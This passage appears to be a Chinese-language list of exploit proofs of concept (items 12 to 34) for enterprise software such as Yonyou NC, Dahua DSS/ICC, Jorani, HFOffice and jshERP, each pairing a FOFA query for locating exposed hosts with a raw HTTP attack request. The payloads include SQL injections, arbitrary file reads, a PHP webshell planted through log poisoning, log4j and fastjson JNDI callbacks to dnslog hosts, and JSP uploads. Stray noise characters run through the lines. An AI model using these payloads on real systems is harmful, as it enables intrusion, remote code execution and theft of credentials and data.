% u$ D7 M( h0 q+ gFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 N, G& K z3 H' ?7 @GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# ~% O) k3 S5 [4 E6 T9 W9 [
Host: 127.0.0.1
$ ~0 z6 u- H6 TPragma: no-cache& v0 F2 \# G N, |" r8 _* x
Cache-Control: no-cache7 O1 F5 ]- T% F: ]+ Y6 \& ?7 G
Upgrade-Insecure-Requests: 1
7 @: C1 m R0 R; pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 t2 a4 P" N' f% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 d9 }% ^! g- V
Accept-Encoding: gzip, deflate8 H6 [" {9 g& K) H9 R7 B( ~# D
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: \: F4 }2 f; h5 N; V
Connection: close
! q& j+ x. ~4 ~7 p4 n9 f# v1 w, Z7 B5 w3 d i1 R* @5 E# @
4 }# _- B. L( i, V6 `1 Y3 p
12. Jorani < 1.0.2 远程命令执行6 H: F( Y' x, l# I) m- h9 t
FOFA:title="Jorani"# ?0 a6 n: T) P# b3 r
第一步先拿到cookie# k5 B! o9 @) y* _( K+ W/ i3 `
GET /session/login HTTP/1.1
3 Z4 b- `8 q+ X+ w1 LHost: 192.168.190.30
9 Y7 M2 N* Y0 q1 P6 Y: MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
$ r" c% M+ r c. |1 e! MConnection: close
. J8 R+ v$ n! E6 r1 g, p8 @Accept-Encoding: gzip
\, y: M- U& {; m6 Z
$ x q% v: o5 N* A" Z# e9 O4 I. p5 ?2 g& I. }. g6 b* i
响应中csrf_cookie_jorani用于后续请求
1 e* ?2 P: t# m. V2 ZHTTP/1.1 200 OK
0 a) K( q: Y) r) x; j' xConnection: close
" ^0 j5 g2 c# QCache-Control: no-store, no-cache, must-revalidate
" G, i, \0 j5 Q3 vContent-Type: text/html; charset=UTF-8' [: v1 e) Q0 Y) H# `: ]3 q
Date: Tue, 24 Oct 2023 09:34:28 GMT$ e3 T7 e; K0 n b+ {5 i. B
Expires: Thu, 19 Nov 1981 08:52:00 GMT
3 ^0 o- O x- M/ W8 rLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
4 @) W( {, K# _ L2 {. A IPragma: no-cache) J( X; ]8 s9 W- h! K9 _
Server: Apache/2.4.54 (Debian)9 R% x- O( B. U# R8 O# [ W
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 H# F' v# a, Y7 g# W
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
0 z- I/ Y& S0 p* N H5 M& T# qVary: Accept-Encoding L( O2 [% x' k. g9 P' d
# I: k, F3 o |- k
# S1 w& e) [! e6 X4 C9 V
POST请求,执行函数并进行base64编码
3 K( B$ h2 \; L ?POST /session/login HTTP/1.1
3 o& c/ X. _" B. L# o. y% T7 DHost: 192.168.190.30
' z. Z5 H; x7 R5 l# ~7 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
: X& [4 m0 n' l8 m; s9 G. x; W: MConnection: close' U7 V2 B- K) ?+ F7 _
Content-Length: 252
5 [* k9 p# c# d7 \, q1 AContent-Type: application/x-www-form-urlencoded
$ Y* C+ S0 U" \Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
3 A4 d! _1 v/ P( |$ w4 AAccept-Encoding: gzip2 k9 P% R: [0 K' y2 m
5 u6 g/ d* o0 |- K( k4 w; }csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
" k8 d( m/ k7 W. V0 ]) i
' {) T& e7 j p6 _( Q) n% @8 |: F$ f! k* d6 o6 c" y: p
* E/ B9 V& Y' Q' F6 c2 M向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
$ N/ {: p8 }: P# Z( N0 q8 PGET /pages/view/log-2023-10-24 HTTP/1.13 e. z @5 u; i2 {5 T- s
Host: 192.168.190.30
" k+ O" V% i! h* C6 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; Y7 y; {( @$ I! e0 k
Connection: close: W4 U# H# R. x( L1 ]: l5 A. J6 R
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
" @2 C2 I# N0 OK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
p/ E7 A. `5 I5 YX-REQUESTED-WITH: XMLHttpRequest
# f8 O9 K! d& a. O' K4 @. k8 _7 _Accept-Encoding: gzip
+ J/ y0 X) x0 k+ g- ^/ W. n+ l! t* a$ P! z- \% Z
1 f( u+ w; S1 f, r& v: o' n& y
13. 红帆iOffice ioFileDown任意文件读取3 z/ b- w. y$ L" G
FOFA:app="红帆-ioffice"
5 Q/ l2 p0 H" z7 w+ S% \1 K: ]GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 u$ p5 o. i# B+ [( o% q
Host: x.x.x.x
4 P, W. x' s- p+ b2 o) ~8 cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 U4 V5 I$ Q/ c0 ~" QConnection: close: c' @& f6 l' y P. m
Accept: */*
9 L6 A! Y0 k, BAccept-Encoding: gzip
' T/ M1 T; s' z" w! r& t- O
. b" k! c# N3 c' s" _; s* U5 Z2 f+ d4 V# a" u# k
14. 华夏ERP(jshERP)敏感信息泄露) P2 j( t, e1 ?8 S9 n4 `# p
FOFA:body="jshERP-boot"+ w) X% v" A: q2 Z
泄露内容包括用户名密码
. V. S# P; p, U bGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
' Y+ F# C" h& W) jHost: x.x.x.x. ]! D' k$ o+ Z" L7 X3 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# @4 v. y$ s- hConnection: close
- t$ O& c! ~& e* FAccept: */** P& o4 s$ b, T! t8 B2 ]. y& s. ~
Accept-Language: en
N# ^$ ?6 R( C" z4 b' `; H& wAccept-Encoding: gzip
- m. }0 e# a) M- N8 Z
/ F/ p4 {( M j( r$ N7 N, o$ J
, c4 B! o" g5 U) j. }15. 华夏ERP getAllList信息泄露
& c5 y, h* t- i; I! E: X! VCVE-2024-0490/ v( ~4 P3 w) j+ r) ~% s
FOFA:body="jshERP-boot"
1 F" h/ [% x( {6 z8 n8 ?: @+ e泄露内容包括用户名密码0 i4 d$ k, q3 y: J" m; ^
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1, e. t- ]# O0 k* J
Host: 192.168.40.130:100
8 R2 `6 h6 O; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
5 ^/ Y& B5 \$ D' s* wConnection: close
8 P0 Y# r; v W# s) {- HAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) Z- V* [5 c* T3 RAccept-Language: en h* t! m# d, X* \
sec-ch-ua-platform: Windows: ~7 K' c6 k Q* S
Accept-Encoding: gzip
8 Z$ s" y3 m' j. R$ ?) ~; B6 t6 A6 o5 q/ C# c a
" `7 t+ ?% A8 U' p" x' t: Y& f. S5 a16. 红帆HFOffice医微云SQL注入9 Z0 n) Q) A8 A: G7 K7 D) [# F" L
FOFA:title="HFOffice"
[5 i/ y1 b/ wpoc中调用函数计算1234的md5值
9 u, y% c& a; Z, g% h- z4 xGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 @8 P3 _7 m8 s; r' e
Host: x.x.x.x
' ]# q' q2 ]5 c! ]" m7 j& X0 r9 FUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.365 X+ b+ M/ r. H% \% M
Connection: close
( [2 @2 i& _8 iAccept: */*
8 q- b @) K2 U; NAccept-Language: en8 d6 p3 I* J; a- M2 E
Accept-Encoding: gzip1 q7 o/ L# x4 ~: Z
; _; G/ M$ E. X' R2 u9 R6 B0 r6 C* L- H6 s- U* h$ B7 \
17. 大华 DSS itcBulletin SQL 注入' e! I+ {& t* B' ]. O
FOFA:app="dahua-DSS"5 s; T, m* X. F8 [% h; D
POST /portal/services/itcBulletin?wsdl HTTP/1.1' u5 M" o0 k4 O. [- Z, I
Host: x.x.x.x
" Q: W) J( f# ]; s! N2 w( ], }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( y' A6 H2 k; AConnection: close- F; k' L5 u) t) V
Content-Length: 345- s" g4 t' c# L$ Z6 U5 |2 ?* P
Accept-Encoding: gzip. [: A! ?. L N. c2 j% J
$ P( @1 c) S7 q& Q- z0 \" v
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> M7 v; \, h& I$ x
<s11:Body>
" b; M6 g( f5 c9 v <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'># M. a$ Y: ~0 F; C) y! n
<netMarkings>. l! g" h! _/ C W& z5 p
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
0 j( r5 z2 l0 ^' {% f4 @, k$ g </netMarkings>
% Z% j4 C+ ~- U; H- \/ ? </ns1:deleteBulletin>
' _9 h: U+ s# R; d5 A9 c </s11:Body>
0 T" ?* g- [( `8 e0 G" |: e</s11:Envelope># S! ?7 g5 c! b0 ?
$ w& r' X/ g" \% K# w; y( }& ^
) j3 s3 t, y" S& d5 E5 ^18. 大华 DSS 数字监控系统 user_edit.action 信息泄露1 {1 H1 [2 T' s" R6 H
FOFA:app="dahua-DSS"
) b1 a5 F; Y- E9 P# M0 JGET /admin/cascade_/user_edit.action?id=1 HTTP/1.18 q/ T( q( W* B. L7 v
Host: your-ip
0 k8 \1 J! A* ?$ u' AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# P$ T. |( k. c$ X- s! }
Accept-Encoding: gzip, deflate
& F. b4 l6 F4 F' H- c" tAccept: */*
: q* _# n% C: e# `9 E* qConnection: keep-alive, h7 s6 L5 e B9 u: N+ c( M
9 m" k& o6 M; K; W
( v' X. t r& k5 Q3 q1 N9 l
" A. Z/ D1 ~8 _8 F# V* l. Z19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 R$ V; @" D; eFOFA:app="dahua-DSS"3 h( C7 U5 Y! b& V' g4 J1 N0 i
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1% C0 D! L( x* S( d9 F# r
Host:4 ?% u8 w# I+ A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% z% h+ ], ?+ F# j. k9 k: y6 ^* xAccept-Encoding: gzip, deflate
' s# p. c( V: K5 @# eAccept: */*( X: j! a4 `- o/ n0 A* Z
Connection: keep-alive
5 x$ I$ n4 [% t, g# ]" W0 q
8 \0 v; y8 A7 f9 B/ _) K# n' Q- X V2 z
20. 大华ICC智能物联综合管理平台任意文件读取
2 d4 B1 j' j0 F/ h) f; uFOFA:body="*客户端会小于800*"
. P4 E: H5 x" Q$ zGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1: N; i# m% r( ?
Host: x.x.x.x
; \* g( @$ n: t% X' T0 v2 lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ M6 |. Z+ T' e* B e, x* HConnection: close# W1 Y8 _' z0 X4 p3 q
Accept: */*5 `( r/ A) U! O: ?" P
Accept-Language: en, a* n, U" a* k" ]# E! I# ~
Accept-Encoding: gzip
$ B8 @ C- j0 @
; ^. w" @& z6 }' y$ G/ d# T
$ `' r5 P9 [) b1 P- |7 `( D6 k1 T21. 大华ICC智能物联综合管理平台random远程代码执行" z2 N- m Z- n* t' v
FOFA:icon_hash="-1935899595"
& t( j2 g3 S; o# N" s5 V- JPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- G* ?2 @# a' T5 |% ?, [
Host: x.x.x.x
' d# L- d' P% W% [; IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- I* ?& v' s! EContent-Length: 161
9 s" b" w0 S. G. u' V# Y& h1 F8 `. _/ l/ EAccept-Encoding: gzip4 P: A4 H( D( N& O* O4 P! L
Connection: close, K& x) |$ N6 X P# c) n' k
Content-Type: application/json;charset=utf-86 M1 e6 X. m# n. l; F1 t
" I# F( m% ^& d{
0 ^7 j. j8 B1 r- A/ I* r% ["a":{- i3 m# H5 i& r2 \
"@type":"com.alibaba.fastjson.JSONObject",6 d6 l* U! u: T/ m2 }' m$ P
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( u$ w) {+ A& I# T' ^ }""
6 R9 q* I" P9 H2 s' S8 ?! P& I5 v}
' Y8 Y- b9 a! A+ H7 Y1 J# S1 T+ u0 w3 H& c8 g2 a& s
* u6 f& V/ e5 I8 Z4 w& r22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 a, o: c. W5 ]( x. \2 u$ }: R
FOFA:icon_hash="-1935899595"; e& w3 g2 T+ S5 a9 L
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
8 ^/ c% I2 Y! M: SHost: your-ip, a) J/ M5 R5 N1 O' Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* O i- o6 M# I9 BContent-Type: application/json;charset=utf-8
/ E/ w: e! s. H1 r4 O6 y7 B& a6 V1 e+ l
{9 U% D4 }) ~( `% D7 ]+ _: u; D7 O
"loginName":"${jndi:ldap://dnslog}"
9 b( j2 U; R- `% ^# T- @! X/ L}. c# p2 L' o0 t0 ~, L; ^7 {
; u3 T( _: {/ ~' k" E8 V# C9 l' V5 O) G1 L
) i$ _3 s# ~9 t" z3 u23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
, u7 i7 K7 v5 x) C, IFOFA:icon_hash="-1935899595"& p' z% X4 t4 n1 J
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 G# g% W2 C& b. G
Host: your-ip6 k7 M2 _- L2 v) b7 c; T' K% f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) [& o1 F% D( G3 ?4 q( n2 ~9 pContent-Type: application/json;charset=utf-8$ O$ d e5 _8 R' k5 ?& x1 V w
Accept-Encoding: gzip9 }. H" j. ] [7 k5 G) L* A+ I
Connection: close
4 @+ c$ u: l5 E( g4 I" {8 i C
; [/ S) G7 ]! z [{4 Y) x7 O% a- _8 s" k
"a":{' ]$ [" I7 m4 {- {( W
"@type":"com.alibaba.fastjson.JSONObject",
: i8 f3 w5 e7 Y7 M! [ {"@type":"java.net.URL","val":"http://DNSLOG"}
% Z0 _& R- o/ P: ^( `& z' k9 n5 n$ D }""
& c6 g9 _% n" Q* K- Z" p}9 Y+ F) e* g1 B$ I) u
* ? v4 n( Y" D4 G
5 S- k( ]8 T+ }! u% ^24. 用友NC 6.5 accept.jsp任意文件上传
$ P# P; S* l- \' a/ T* Q+ {7 SFOFA:icon_hash="1085941792"6 }- r& X N. G4 v6 d/ Z* V& N
POST /aim/equipmap/accept.jsp HTTP/1.1
7 I( r4 B r: J/ J5 u z% h9 sHost: x.x.x.x) V& ^8 b. O) l, u0 x' l
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.360 n; s4 d; X: N' u0 }
Connection: close' A4 j0 x9 w* y( P+ \( e
Content-Length: 449
! Q( z! X8 ]9 o! L: ]! _; I+ SAccept: */*' e* P7 ^6 X, W5 \
Accept-Encoding: gzip* Y/ a4 d* S: `3 O. L5 v' p ]1 h
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
1 ~9 t" I8 A5 H$ ?( ?# F/ P. Q
x9 E" ^1 L! j, S+ t$ o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
9 e! b; s$ p+ @/ W% t; ^ |Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"' n% n( C: Y$ B: ?1 E& P
Content-Type: text/plain
- t1 L) F W2 R5 K; k$ o+ j/ y! v7 l' X/ c l# K
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>4 `# I( f! I2 v' I, v7 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: Z0 G3 Q7 p- l* u- EContent-Disposition: form-data; name="fname"
) g; V+ N4 ]8 i2 I( R2 Q9 N$ Q2 \2 ]' W' i4 w
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
+ q6 h2 ]7 Y' R3 ^% N# X7 s' ^ @: `! b-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
9 d5 y P5 W0 d$ m/ f8 _; e/ y e" j3 d
2 {9 S4 X7 I' A! \! B25. 用友NC registerServlet JNDI 远程代码执行
, |8 s2 }8 y3 O |6 I8 M5 PFOFA:app="用友-UFIDA-NC"& v5 F" ^5 v$ ?
POST /portal/registerServlet HTTP/1.1
. y. X! v% K9 S7 i. E' y; ~ j2 UHost: your-ip
5 A; `) w( y: K. kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0; U W# G% L, ~3 K) Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
( \+ }9 Z1 X! Q3 L. S. RAccept-Encoding: gzip, deflate7 o2 v! e( t% h
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
& I( E9 k$ p: S" j3 {! w. R& SContent-Type: application/x-www-form-urlencoded1 O @+ h2 e. F X7 ?* M
- {3 v, n9 C/ X I, M7 w: wtype=1&dsname=ldap://dnslog: Z4 A8 I; X2 X/ N' @, ^ a
0 \% X' m0 |2 f0 i& C! B i6 g6 J8 w
8 i7 W+ |3 Q% N) l6 v- X. a* I( l6 T2 h2 ?+ d! W
26. 用友NC linkVoucher SQL注入& D5 G0 T5 G5 a: Y& r
FOFA:app="用友-UFIDA-NC"
! y0 f$ f4 P$ Q/ H7 wGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1; G. x) O1 G) R5 i5 u
Host: your-ip; R) x2 S4 S0 D' j7 k8 w0 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- k$ Q/ G/ J0 i. g& h9 { W
Content-Type: application/x-www-form-urlencoded8 L/ O5 I4 i* Y8 B: n$ h( u( L! v- l
Accept-Encoding: gzip, deflate9 Y3 X: r f0 t; R9 ~" H4 W
Accept: */*
0 e; d% _ e& _, d2 SConnection: keep-alive- V: r* c. V1 b* l4 N
8 z' o: S( O4 b4 ]3 G+ t2 z2 v: _
6 S; \, `% q9 [# t3 E0 p27. 用友 NC showcontent SQL注入
( E! B$ C5 D2 p KFOFA:icon_hash="1085941792"
J. d: i9 r& ~, U4 i; }GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
6 j ]1 w' F' L8 r: IHost: your-ip
; j, @. @3 X6 ]* }$ i, w/ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; m8 b/ T3 J9 {) D7 p4 ?
Accept-Encoding: identity
3 [: F" U6 w/ ~5 \2 Z* O0 dConnection: close J( x/ |7 T1 U4 j
Content-Type: text/xml; charset=utf-8
" }! L' `, t: X% R# q
. K4 f5 V) N' E: A/ h ?
, s+ N+ n& Z8 ~5 t. Q$ p28. 用友NC grouptemplet 任意文件上传% B2 g/ `( ^- K+ t5 ]) ~4 e5 q) t
FOFA:icon_hash="1085941792"; i9 C" B2 o: i6 W
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.18 Q8 @/ P9 J- e3 E, a0 E2 L
Host: x.x.x.x6 Q; I7 M9 t" W# G+ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36: C5 I8 \2 U: V( f
Connection: close( w& E9 }' i ?1 h8 |
Content-Length: 2687 I9 U% }: O6 v" r5 ?* S& w
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
3 V; O7 W/ B7 U6 f+ N, A2 b8 {Accept-Encoding: gzip
% } y, t% S/ l
. n; M+ A* Y3 c* ~3 ?$ b------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
- E0 [( O$ s0 ~+ g- o+ gContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
4 f5 k6 }2 ` e8 ?8 rContent-Type: application/octet-stream% s, u7 q; W" ?% O! R3 \9 `3 T- I
2 w/ b* }' ^& D- S
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>" p; k5 z! J: O0 U6 b
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--3 j2 D+ l$ j/ E9 w2 u% ~* `
9 n" S2 i$ Z- G& a0 T9 f
' Y: b+ n" t1 d |/uapim/static/pages/nc/head.jsp. s2 S- z, Y; v; s1 M# p& v
$ ]% e7 E7 D( s$ `; J( K9 {2 [4 }
29. 用友NC down/bill SQL注入
. z, P$ A$ u' q9 t1 b1 `, N( YFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; h* m/ K- h, CGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1! h& a' b9 W5 h9 E7 f
Host: your-ip, c5 B' M5 `* L4 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' D! V7 A, n) Z/ G2 g
Content-Type: application/x-www-form-urlencoded) u! O7 G; W3 j% s S; u# K
Accept-Encoding: gzip, deflate5 `, \4 S- Q) \* d' c4 V* Y& G
Accept: */*
1 P8 E8 m9 g/ t& q4 m- L0 y. dConnection: keep-alive/ e2 B/ e: [/ H* c. N5 G' w
# X# ?+ O" ~" U; y& g% s
- d+ G+ E4 t* K' y9 g8 X
30. 用友NC importPml SQL注入$ P$ Q. h& Y1 e) `1 w6 a' b
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"7 A' @$ K/ y- d) A& i7 W. T( Y
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
% R' P+ Q* ?7 o; W p* |6 Z& [0 ~Host: your-ip/ k4 D0 y- O: g, W8 E7 b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
, ]9 O8 Q0 D- RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 p( z/ K1 ^4 i, d
Connection: close
" I# v( U' U* B% _" [/ s: e+ h9 v6 W7 j8 ]+ g
------WebKitFormBoundaryH970hbttBhoCyj9V
- A7 N; ~( w5 o: @2 T& \Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
9 A/ m# E! e) F. G! m0 qContent-Type: image/jpeg
. r. n3 V7 v6 K------WebKitFormBoundaryH970hbttBhoCyj9V--5 y5 Q& P* \6 Y4 g% g0 T
( O, _( a7 i3 ?' F. o2 S% w. K* G: X
31. 用友NC runStateServlet SQL注入7 k* a; F- P: G3 G/ T r5 D6 |* k
version<=6.5
8 x+ M& z: ^/ }* XFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"" x9 a4 C/ N7 z8 M
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.18 ` [2 K6 s( z7 h( M% _
Host: host3 a( E) U* I$ Y; \% j6 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 X1 t4 I& b( |; i, X: z. e$ S
Content-Type: application/x-www-form-urlencoded4 i3 S) ?) O6 @1 H
3 l$ p! R3 [6 V- o7 v g* a
% U% u0 A( d% x" `; p% L+ s32. 用友NC complainbilldetail SQL注入+ R6 ^* m* }7 v7 Y6 v! l2 ?
version= NC633、NC65& {1 e: E4 I- A" {( [
FOFA:app="用友-UFIDA-NC"5 o- P8 _ [) F' o1 U' ?
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1% z- N' T, ^& b S( Q1 s
Host: your-ip# q4 e; g, \) D7 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; m! X7 p* q9 Z- NContent-Type: application/x-www-form-urlencoded
2 n& X" S8 [6 t ~Accept-Encoding: gzip, deflate3 C- M" l1 p( t; p- h
Accept: */*
3 s! o E. k* `2 N' }8 R$ J9 qConnection: keep-alive
5 s$ E/ L: O# v1 q) q. _, h2 J3 z+ Q8 }/ K* J+ h" E$ G2 b. \
% V8 q. Z& z! u+ F7 P
33. 用友NC downTax/download SQL注入; H3 K% R7 h# d7 [3 C! Q9 ]
version:NC6.5FOFA:app="用友-UFIDA-NC"
7 X( T( j3 U& [7 w$ I4 ]/ n' E: fGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( m3 V2 W8 |; U5 e) } aHost: your-ip/ Z& a4 R! w' p4 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 r M( }; N2 O, S& l
Content-Type: application/x-www-form-urlencoded
% h$ {/ T9 G T- z% _. Q" zAccept-Encoding: gzip, deflate
, g* m) D4 O }" `' Z) ]( YAccept: */*/ H" C6 ^; G6 z
Connection: keep-alive
+ F; e) ]9 ^" ~ {9 g9 H3 S, g/ @* I) T( Y0 Y
; n6 G: W, R o4 x( e0 i8 S' x
34. 用友NC warningDetailInfo接口SQL注入4 v9 L1 W4 N- \* x! c/ Z
FOFA:app="用友-UFIDA-NC"
) ]9 V2 j% a- J* ^: D2 E( vGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.12 `" D. H! |6 V* A9 y9 p. x% \
Host: your-ip' j/ D: ^' `- Y9 S: @2 o* Z2 {- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 B8 R8 n ~# i3 w/ s& s' LContent-Type: application/x-www-form-urlencoded) c; N% i* n, u
Accept-Encoding: gzip, deflate8 A' N D/ \$ ]& b
Accept: */*
- k/ u. c$ z6 U# L1 ~% H) I$ AConnection: keep-alive
